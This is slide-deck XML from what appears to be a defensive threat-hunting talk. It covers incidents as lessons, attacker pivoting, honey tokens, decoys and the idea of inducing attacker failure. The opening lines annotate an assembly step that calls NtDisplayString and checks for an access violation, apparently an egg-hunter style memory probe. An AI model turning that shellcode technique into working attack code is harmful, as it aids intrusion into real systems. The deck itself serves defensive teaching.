                <a:t>nt!NtDisplayString</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> kernel function</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>cmp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> al,0x5  check if access violation occurs (0xc0000005 == ACCESS_VIOLATION)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Graphic 24" descr="Thumbs up sign with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66E8CA4D-3846-9D99-BB1B-68A1F5E7D0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6100" y="3729000"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2084081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3054BDE-A17D-70B4-ADCD-AB015A0B3934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In summary…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDD4F657-34A1-FD3C-06A6-6FC3F67D980A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Foundational Concepts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365E0EBA-425C-521F-BB13-CA1F8E9691E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Every contact leaves a trace…in a log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Layers of the attacker prism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Pivoting is navigating the graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B12DE22E-F04D-8B8C-AB70-5FEFDA3F1A64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strategies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94FF3978-EE96-B33A-2F09-F12C37673A88}"/>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Hunting until Closure of the Pivoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The FN Pump </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Kill Chain Discount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time Travel Breach Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zoom Out to widen the field of vision</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E36520CE-1B29-461E-9EAA-596307BF67E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412472" y="2190751"/>
            <a:ext cx="3427047" cy="655320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tactics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045ADE03-9A33-AC0B-21EB-EE365E6B854E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412476" y="2940316"/>
            <a:ext cx="3847257" cy="2168894"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Looking for failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inducing failure </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Move attackers to more favorable terrain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bones of the Skeleton</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Hunt their professionalism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263042090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19EB1-51B1-7174-1606-1906D696BCA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thank you!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture Placeholder 5" descr="A person with glasses and beard smiling&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5849092A-F48A-E662-D0EA-8E5753AEF6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7385897" y="0"/>
            <a:ext cx="4520354" cy="6994525"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04697CC-374F-E36E-FD00-25337222C388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994852" y="6254554"/>
            <a:ext cx="2891118" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://aka.ms/careers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281239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3842-436F-05B3-6E15-BF7078364846}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incidents as Truth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E1AC9F-BB4F-28B1-2137-2A261067C531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595915" y="1463668"/>
            <a:ext cx="4468820" cy="1723549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ground yourself in reality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incidents teach powerful lessons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks contain insights</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can awaken giants with new imagination and energy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CA1727D-2AD6-A26E-4B2F-9B766B27709A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="595915" y="3497262"/>
            <a:ext cx="3751861" cy="1364913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10276AE7-F8F7-46F9-FBEF-D989CBD915FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="595914" y="5100915"/>
            <a:ext cx="3751861" cy="1364913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F072AAEA-9F8A-AF12-DCEB-6E587A60D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125" y="1378916"/>
            <a:ext cx="6333302" cy="47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4084242-709A-244C-CDDC-3ED21CA7C399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9436855" y="4194262"/>
            <a:ext cx="2155710" cy="1421347"/>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184107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2F976-BD59-1D2B-9B79-0FCC02F41096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Myth that offense has a richer arsenal than Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="medieval weapon obj">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3BDF257-DC68-40B4-E44D-A4F6AF9E5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944" y="1301480"/>
            <a:ext cx="4655657" cy="46556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lver Shield PNG Image - PurePNG | Free transparent CC0 PNG Image Library">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACA5955-F749-1D10-A90E-3B9FC41F2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493" y="1579429"/>
            <a:ext cx="4015941" cy="4015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62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23A4-1393-6EFF-1E17-8A3B475241BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059" y="466301"/>
            <a:ext cx="11239464" cy="492443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many Defensive Strategies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011DD949-E141-5448-16B5-E2387859CA66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="129958" y="6715876"/>
            <a:ext cx="3690480" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[1] https://en.wikipedia.org/wiki/Medieval_fortification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D32C6FD-C160-FEAD-45A3-40D99720FD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2551555" y="1611348"/>
            <a:ext cx="2150037" cy="4179168"/>
            <a:chOff x="2280493" y="1552913"/>
            <a:chExt cx="2150037" cy="4179168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41BED5A0-035F-2FC9-2704-13462BCF432B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2306439" y="2136367"/>
              <a:ext cx="2124091" cy="3595714"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E13D719-D371-21AC-2E98-36603258FF19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2280493" y="1552913"/>
              <a:ext cx="2124091" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Stumble Steps</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Inducing Failure</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CC2B6AC-D007-66DE-C4FC-13919B408BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5178355" y="882467"/>
            <a:ext cx="2631693" cy="2062526"/>
            <a:chOff x="4808583" y="2682918"/>
            <a:chExt cx="2631693" cy="2062526"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3078" name="Picture 6" descr="Red Dye Pack Explodes On Newark Bank Robber - YouTube">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E1A2AE-7F9F-6E5C-B4B8-112B4E4C5C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584" y="3268588"/>
              <a:ext cx="2631692" cy="14768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58782B-BB91-5814-ABAB-934C08283A92}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4808583" y="2682918"/>
              <a:ext cx="2631692" cy="553998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Explosive Dye Packs</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>Honey Tokens/Documents</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C70C253-2130-F8C4-F891-F5696ADA85EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8666209" y="542040"/>
            <a:ext cx="2699574" cy="2500645"/>
            <a:chOff x="8666209" y="542040"/>
            <a:chExt cx="2699574" cy="2500645"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3076" name="Picture 4" descr="WWII in Photographs, D-Day: Inflatable Decoys of Sherman tanks. There...">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E883BA6-84D7-4B1C-D36E-C25EFB794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1469" y="1139984"/>
              <a:ext cx="2584314" cy="19027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C9E90F8-1A2B-B121-BD4D-7CD9ADB83CB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8666209" y="542040"/>
              <a:ext cx="2584314" cy="553998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Decoys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>Honey Pots</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 32">
            <a:extLst>
